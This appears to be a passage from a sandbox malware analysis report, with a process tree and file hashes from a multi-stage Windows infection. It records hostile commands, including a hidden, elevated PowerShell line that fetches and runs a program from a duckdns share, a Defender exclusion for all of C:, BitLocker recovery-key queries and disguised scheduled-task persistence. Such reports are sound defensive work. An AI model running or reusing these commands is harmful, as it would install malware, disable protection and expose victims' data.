                                                            • Modifies Windows Defender notification settings
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Windows security modification
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3152
                                                          • C:\Users\Admin\AppData\Local\Temp\10455950101\0d166aa0d2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10455950101\0d166aa0d2.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:5484
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5480
                                                          • C:\Users\Admin\AppData\Local\Temp\10455960101\5b0f25b410.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10455960101\5b0f25b410.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:3988
                                                          • C:\Users\Admin\AppData\Local\Temp\10455970101\040050898e.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10455970101\040050898e.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:5216
                                                          • C:\Users\Admin\AppData\Local\Temp\10455980101\0BiRjfE.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10455980101\0BiRjfE.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4684
                                                          • C:\Users\Admin\AppData\Local\Temp\10456000101\larBxd7.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456000101\larBxd7.exe"
                                                            6⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6440
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6960
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2968
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /I "opssvc wrsa"
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2376
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:6964
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:6836
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c md 689912
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4440
                                                              • C:\Windows\SysWOW64\extrac32.exe
                                                                extrac32 /Y /E Exclusion.psd
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:6992
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /V "users" Findarticles
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5104
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1180
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3992
                                                              • C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
                                                                Jordan.com b
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:5168
                                                              • C:\Windows\SysWOW64\choice.exe
                                                                choice /d y /t 5
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4340
                                                          • C:\Users\Admin\AppData\Local\Temp\10456010101\qhjMWht.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456010101\qhjMWht.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5504
                                                          • C:\Users\Admin\AppData\Local\Temp\10456020101\TbV75ZR.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456020101\TbV75ZR.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:3712
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:408
                                                          • C:\Users\Admin\AppData\Local\Temp\10456030101\6468682c2a.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456030101\6468682c2a.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Writes to the Master Boot Record (MBR)
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:3620
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10456041121\pfJNmVW.cmd"
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2332
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
                                                              7⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6596
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1992
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
                                                                  9⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:6344
                                                                • \??\UNC\aaso12.duckdns.org\shear\s.exe
                                                                  \\aaso12.duckdns.org\shear\s -fullinstall
                                                                  9⤵
                                                                  • Sets service image path in registry
                                                                  • Drops file in Program Files directory
                                                                  PID:7092
                                                          • C:\Users\Admin\AppData\Local\Temp\10456050101\1ab8b963aa.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456050101\1ab8b963aa.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:7112
                                                          • C:\Users\Admin\AppData\Local\Temp\10456060101\trOUuPI.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456060101\trOUuPI.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:3588
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6992
                                                          • C:\Users\Admin\AppData\Local\Temp\10456070101\but2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456070101\but2.exe"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4996
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4936
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:6412
                                                            • C:\Drivers\pcidrv.exe
                                                              C:\Drivers\pcidrv.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5140
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10456070101\but2.exe
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:936
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /t 2
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Delays execution with timeout.exe
                                                                PID:5476
                                                          • C:\Users\Admin\AppData\Local\Temp\10456080101\Rm3cVPI.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456080101\Rm3cVPI.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2828
                                                          • C:\Users\Admin\AppData\Local\Temp\10456090101\9sWdA2p.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456090101\9sWdA2p.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5164
                                                          • C:\Users\Admin\AppData\Local\Temp\10456100101\UZPt0hR.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10456100101\UZPt0hR.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:1716
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                              7⤵
                                                                PID:3948
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                  8⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:7064
                                                              • C:\Windows\system32\svchost.exe
                                                                "C:\Windows\system32\svchost.exe"
                                                                7⤵
                                                                • Downloads MZ/PE file
                                                                • Adds Run key to start application
                                                                PID:4680
                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    1⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6736
                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    1⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6516
                                                  • C:\Program Files\Mesh Agent\MeshAgent.exe
                                                    "C:\Program Files\Mesh Agent\MeshAgent.exe"
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    • Drops file in Program Files directory
                                                    • Modifies data under HKEY_USERS
                                                    PID:4972
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -noprofile -nologo -command -
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6024
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -noprofile -nologo -command -
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5576
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -noprofile -nologo -command -
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5136
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -noprofile -nologo -command -
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4668
                                                    • C:\Windows\system32\cmd.exe
                                                      /c manage-bde -protectors -get C: -Type recoverypassword
                                                      2⤵
                                                        PID:7076
                                                        • C:\Windows\system32\manage-bde.exe
                                                          manage-bde -protectors -get C: -Type recoverypassword
                                                          3⤵
                                                            PID:344
                                                        • C:\Windows\system32\cmd.exe
                                                          /c manage-bde -protectors -get F: -Type recoverypassword
                                                          2⤵
                                                            PID:1640
                                                            • C:\Windows\system32\manage-bde.exe
                                                              manage-bde -protectors -get F: -Type recoverypassword
                                                              3⤵
                                                                PID:6816
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                            1⤵
                                                              PID:4164
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                              1⤵
                                                                PID:4904

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Program Files\Mesh Agent\MeshAgent.db

                                                                Filesize

                                                                154KB

                                                                MD5

                                                                ea0c838a86250195b63cf4624f3e8b1b

                                                                SHA1

                                                                5e468a3ddb7ad6f5531ad34bc3820b9f923cdd86

                                                                SHA256

                                                                e98af13a6a169657f10500f1992bab51ea988a9db02487f66c9552b4677b6313

                                                                SHA512

                                                                b54de217ee1f3f68e2294687299d2034fb1a887f52a05156dd72550596753aa558c37812d22a42a14adacb2b107f1de9f844b220499af18311945e63a1f8c224

                                                              • C:\Program Files\Mesh Agent\MeshAgent.db.tmp

                                                                Filesize

                                                                154KB

                                                                MD5

                                                                4b79213b61424eaa4a5037a4af7bfe34

                                                                SHA1

                                                                dae18705ede5852e7e9bb286b141e7822cb897a3

                                                                SHA256

                                                                72e1de0c07acfae908f1397333b91c33433a3ac65f2251b18ccf0625b3f0127e

                                                                SHA512

                                                                f8c8caf74c6b4d394ba8ebacb2a7ef707854cd3d9bdad8841b1408699d00d11fc06ed83ce5a39d62e121497ffbf85a5edc58132fe06539eb8ff588ffe3d4d784

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7P8EHEOE\soft[1]

                                                                Filesize

                                                                3.0MB

                                                                MD5

                                                                91f372706c6f741476ee0dac49693596

                                                                SHA1

                                                                8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

                                                                SHA256

                                                                9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

                                                                SHA512

                                                                88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LK221CO5\service[1].htm

                                                                Filesize

                                                                1B

                                                                MD5

                                                                cfcd208495d565ef66e7dff9f98764da

                                                                SHA1

                                                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                SHA256

                                                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                SHA512

                                                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\activity-stream.discovery_stream.json.tmp

                                                                Filesize

                                                                24KB

                                                                MD5

                                                                e16225dcfda6c333dc32a74542f03ef4

                                                                SHA1

                                                                2b870e6e9e2d0cea18a88bfe92d7fe6c0626eee6

                                                                SHA256

                                                                aab85a0acc3fbd5d7cbc9e1a2ed5aaf1abaf949967b872b6b58c09686846eeac

                                                                SHA512

                                                                3ed5fdd83d1eb1263a63df0d59be82a9636d0583a033da60b7aff47fe7765e3ee5eed0b04544bbc51a5226a1b5ba6ff477cc84c38ee8e21c181c3c32ef05b3a9

                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                                Filesize

                                                                13KB

                                                                MD5

                                                                2cd0ab4c771eabf74e876e0e6df869c7

                                                                SHA1

                                                                dd6b2c0c132165951424cb70af88ac3e1ac84ed2

                                                                SHA256

                                                                8f551fe77df481a196029bbcc23affe2481a9f6d3f14fddb999c51d6d914f3e3

                                                                SHA512

                                                                347d39bc919830004ab834f3e1376db41b645c4b50f9c49ce86bd8c8fe9282e3cdfec8249a0a5e62860d8a8142df128c9c3f3bf5d267e4560ffc11e454f133dd

                                                              • C:\Users\Admin\AppData\Local\TempRW4Q2TSRQGDNNDKSS1HZELL8TUBQAFEB.EXE

                                                                Filesize

                                                                1.8MB

                                                                MD5

                                                                4a36e5d598da891073a2f39ec0ecc5ae

                                                                SHA1

                                                                231e2e0df4e3aae9a9484f69ca865a1a01eece69

                                                                SHA256

                                                                613973e7f0e3969a21cddcd693126661ab5a73fcb1767248952d7263ab40e4f8

                                                                SHA512

                                                                cc1bc795265c1718cdfe1078b2bdf28a7e21d584fad0fae2e322c15f0fe28ee40e773e91f50b05e901d9b2d74f89904770992cfd9a96d3fd308dec0409f2c4ad

                                                              • C:\Users\Admin\AppData\Local\Temp\10455080101\apple.exe

                                                                Filesize

                                                                327KB

                                                                MD5

                                                                af4d2379e28fd1c9d99ab993ed99d345

                                                                SHA1

                                                                53be762be7859652114bc19510d7828780600c7f

                                                                SHA256

                                                                502efda7464100a47d48e9fff2812bfee072050135146182390ce1a47ba808c8

                                                                SHA512

                                                                4f3f703e2b4a7e1ba82390ec3e5f8a5880e7c9998e522bc2a036182d68c43bb3a2797a7295e77be8fb311699259084b67069029201d00736eea9db28a857699e

                                                              • C:\Users\Admin\AppData\Local\Temp\10455420101\0BiRjfE.exe

                                                                Filesize

                                                                2.8MB

                                                                MD5

                                                                06fe2f7f9d6aac801aa0b36bc7c6f128

                                                                SHA1

                                                                296ae30c0a20f191680011bd4591921fe96f1a14

                                                                SHA256

                                                                27e51de30ab360f9c57df82b05aac4d6e7305c79ab28b9dfd442b0dd412e407c

                                                                SHA512

                                                                ecdaf2bdd81e8a621ad5b8b8aacd1ed193038d519d0e830a7b042858ce821a351e2e9dba7f7fa28b508a2de48f80b7614d051cbd1158788df5023c134828aa5d

                                                              • C:\Users\Admin\AppData\Local\Temp\10455890101\ba83eb8474.exe

                                                                Filesize

                                                                5.9MB

                                                                MD5

                                                                e05432c13d42b8526ce4bc0dc240d297

                                                                SHA1

                                                                db6e9382425055030662ecdc95d6405d30dcf82a

                                                                SHA256

                                                                574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

                                                                SHA512

                                                                56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

                                                              • C:\Users\Admin\AppData\Local\Temp\10455900101\c46a8a82c7.exe

                                                                Filesize

                                                                4.3MB

                                                                MD5

                                                                131518901e9cd1be418c2b7de9487ab2

                                                                SHA1

                                                                296d04e93286d4899e75f4358cb2f4744009640b

                                                                SHA256

                                                                bc2c53a0108a287fbcc9ce47b6b8693a29047e8ad508e7fc54e1b35673236ea3

                                                                SHA512

                                                                e9d102a6782cfc80e6e2ac68f1db7336c4b89bea9d02ecba5d9ebaa2904d62316b30dc3053876b46c072f828629fb13d82a7a8a294cd765648995eeb165c2c5a

                                                              • C:\Users\Admin\AppData\Local\Temp\10455910101\7d2959d19c.exe

                                                                Filesize

                                                                2.0MB

                                                                MD5

                                                                fe2c1db76826c3e95107d9de5c7a2ff6

                                                                SHA1

                                                                a0fceb57f6179e04cace1c5e7ae0576d466f1ca8

                                                                SHA256

                                                                0282e7dc1edb56592710d1f8126d318077b2052d0064d6c4b7334c451599e819

                                                                SHA512

                                                                e4462860ee45a8927fa476c64aedd4327b435900c4332ca7da14761a16387a64967c01082de77a1af54ea1a8611ed23bb86cc5bbd6f0fc4651715e9a622c832e

                                                              • C:\Users\Admin\AppData\Local\Temp\10455920101\28554feffe.exe

                                                                Filesize

                                                                2.4MB

                                                                MD5

                                                                19566eafae557dfa3c1d4438b9e5065e

                                                                SHA1

                                                                a6f8ab7dbf1746fdbde3a4b953f1dcd4cdbb96c0

                                                                SHA256

                                                                a326a10509618bb12abb2e30df3f659f2ecac558ffce2adc9126647ec90e8928

                                                                SHA512

                                                                b545bb7424df0dc2df4748cb689a8e6acd1149b4796df83fcc63edcab46533f498c1b90321ae1882756e6da6e1390547d1aeec2854dc101c38ace67e82fd2299

                                                              • C:\Users\Admin\AppData\Local\Temp\10455930101\f0df259dd9.exe

                                                                Filesize

                                                                948KB

                                                                MD5

                                                                527554a445679c0fc35c4065d6f1c55d

                                                                SHA1

                                                                b20397a33028189d7d41689dc1e3e48aa93037cf

                                                                SHA256

                                                                e9bb3427cb89f7d657617c223692b7abdf590c46222855d5b716d9d7a5d70ca3

                                                                SHA512

                                                                ded34ce2244d10e7af921a8eaa8ce73238b9bebcd3a3955f71a8f456a20aff245915b37eddb2f0d7b760b7f24c12367f714c33c4dc81c0270387b862f5ccb1d9

                                                              • C:\Users\Admin\AppData\Local\Temp\10455940101\6984f58e7c.exe

                                                                Filesize

                                                                1.7MB

                                                                MD5

                                                                658a0f92d7c18183cd70af2535266865

                                                                SHA1

                                                                1ebb345e7c9430e4157a37e81e23052eb252f312

                                                                SHA256

                                                                9ff3d8a6ed049813b6ad8153b33ca2ee04a22b1982930b25319dbfd0dadbe75a

                                                                SHA512

                                                                cc3cab246c1bbd85d29272a213ca4c8d5ef5bdeb4b8d347ab508cff45d6299e61a6bec4c1b63f6a0ea5df61c3d908bb64966d4df721a08e5343eec98f1d2a7c4

                                                              • C:\Users\Admin\AppData\Local\Temp\10455950101\0d166aa0d2.exe

                                                                Filesize

                                                                956KB

                                                                MD5

                                                                83457e01fa40348dfee40d4832d2d09a

                                                                SHA1

                                                                4f4944f5923de6563e702bba00339ac4d2d70292

                                                                SHA256

                                                                20da0dcdfbe199c63d3ba34bbc08f5a79c8ee28ad1ae069994da6788a2aced3b

                                                                SHA512

                                                                e1954f4c2896f148df99937e9c59bdeb11dfcc613931423e6ea9d7fb1edbf77c042d32a8d212b9884907321671145b010310b0ca6fea0708feb690a9ff73414f

                                                              • C:\Users\Admin\AppData\Local\Temp\10455960101\5b0f25b410.exe

                                                                Filesize

                                                                716KB

                                                                MD5

                                                                57a5e092cf652a8d2579752b0b683f9a

                                                                SHA1

                                                                6aad447f87ab12c73411dec5f34149034c3027fc

                                                                SHA256

                                                                29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

                                                                SHA512

                                                                5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

                                                              • C:\Users\Admin\AppData\Local\Temp\10455960101\5b0f25b410.exe

                                                                Filesize

                                                                358KB

                                                                MD5

                                                                e604fe68e20a0540ee70bb4bd2d897d0

                                                                SHA1

                                                                00a4d755d8028dbe2867789898b1736f0b17b31c

                                                                SHA256

                                                                6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

                                                                SHA512

                                                                996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89

                                                              • C:\Users\Admin\AppData\Local\Temp\10455970101\040050898e.exe

                                                                Filesize

                                                                1.4MB

                                                                MD5

                                                                f3f9535109155498021e63c23197285f

                                                                SHA1

                                                                cf2198f27d4d8d4857a668fa174d4753e2aa1dca

                                                                SHA256

                                                                1ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f

                                                                SHA512

                                                                a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755

                                                              • C:\Users\Admin\AppData\Local\Temp\10455970101\040050898e.exe

                                                                Filesize

                                                                730KB

                                                                MD5

                                                                31aeed8d880e1c68a97f0d8739a5df8a

                                                                SHA1

                                                                d6f140d63956bc260639ab3c80f12a0e9b010ee9

                                                                SHA256

                                                                bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97

                                                                SHA512

                                                                bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748

                                                              • C:\Users\Admin\AppData\Local\Temp\10456000101\larBxd7.exe

                                                                Filesize

                                                                1.2MB

                                                                MD5

                                                                4641a0bec2101c82f575862f97be861c

                                                                SHA1

                                                                0dd1ee06cdb7ba9ef2aa1dc44c80f1bc2586d33b

                                                                SHA256

                                                                fc2ac17498bd7846607110e66426bdad0ab5302f5c7978dd72c20d99166292e1

                                                                SHA512

                                                                da87190b368b99feafdb6cfb2fe236c94741573f494ca1cc9127f3a34e9112e1c8d4bf794841b4f00d3f083bc8239226d7d6ffecb45eb02299ff4e03e6e3749a

                                                              • C:\Users\Admin\AppData\Local\Temp\10456010101\qhjMWht.exe

                                                                Filesize

                                                                5.8MB

                                                                MD5

                                                                1dbdcaeaac26f7d34e872439997ee68d

                                                                SHA1

                                                                18c855f60fb83306f23634b10841655fb32a943b

                                                                SHA256

                                                                3142aecf9794be2f3894d3e1429d28f80918c5b41d516c9160e7cd3984a6f5a3

                                                                SHA512

                                                                aa447551d1d44d8b615a3d8a656c4085d024cc72fa9ead0b944c72dd7ff5bdab60fd7829440d9c2b4b2de364ca33d349e5716699e2cefd4835e35bbc7e421535

                                                              • C:\Users\Admin\AppData\Local\Temp\10456020101\TbV75ZR.exe

                                                                Filesize

                                                                1.9MB

                                                                MD5

                                                                b53f9756f806ea836d98ff3dc92c8c84

                                                                SHA1

                                                                05c80bd41c04331457374523d7ab896c96b45943

                                                                SHA256

                                                                73ca9bc319d447e03a717b4f781aca8dc11a5bec82ace59751f285341e4b137c

                                                                SHA512

                                                                bd776a3f3ae229fb36f54674323ddeea0a631acfc18578860ed282667fcc5047d2b5033aba4f88f5908d909d0969081a94cb1cb3efbb9ecaeff526c0fb2ecddb

                                                              • C:\Users\Admin\AppData\Local\Temp\10456030101\6468682c2a.exe

                                                                Filesize

                                                                2.0MB

                                                                MD5

                                                                e2385f977e0f94cdee068789c9916894

                                                                SHA1

                                                                d402d78a2ede31c93e742a89cd1281eb39351219

                                                                SHA256

                                                                06e59d9211dccfccf111e17be939b6699d853407e24d72d97e42457edca61217

                                                                SHA512

